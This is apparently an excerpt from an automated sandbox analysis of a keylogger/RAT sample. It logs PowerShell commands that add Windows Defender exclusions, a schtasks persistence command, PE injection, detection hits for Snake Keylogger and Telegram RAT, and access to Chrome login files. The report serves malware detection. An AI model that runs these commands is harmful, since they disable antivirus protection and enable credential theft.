                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 2100000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 3C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 5F80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 6F80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 71F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 81F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 450000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 250000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 21C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 530000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 5F90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 6F90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 7380000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 8380000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 200000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 22F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 450000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1497Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3203Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2444Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3048Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrWindow / User API: threadDelayed 1270Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrWindow / User API: threadDelayed 8516Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2631
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2087
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2582
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1909
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeWindow / User API: threadDelayed 9024
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeWindow / User API: threadDelayed 799
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3428Thread sleep time: -360000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3788Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3828Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 4028Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3360Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3360Thread sleep time: -3600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3368Thread sleep count: 1270 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3368Thread sleep count: 8516 > 30Jump to behavior
                Source: C:\Windows\System32\taskeng.exe TID: 4008Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3316Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 4044Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3304Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3296Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3148Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3420Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3412Thread sleep time: -12912720851596678s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3412Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3408Thread sleep count: 9024 > 30
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3408Thread sleep count: 799 > 30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory written: C:\Users\user\AppData\Roaming\swagodi78811.scr base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory written: C:\Users\user\AppData\Roaming\gRpkBp.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"Jump to behavior
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\gRpkBp.exe C:\Users\user\AppData\Roaming\gRpkBp.exe
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess created: C:\Users\user\AppData\Roaming\gRpkBp.exe "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrQueries volume information: C:\Users\user\AppData\Roaming\swagodi78811.scr VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrQueries volume information: C:\Users\user\AppData\Roaming\swagodi78811.scr VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeQueries volume information: C:\Users\user\AppData\Roaming\gRpkBp.exe VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeQueries volume information: C:\Users\user\AppData\Roaming\gRpkBp.exe VolumeInformation
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gRpkBp.exe PID: 2060, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
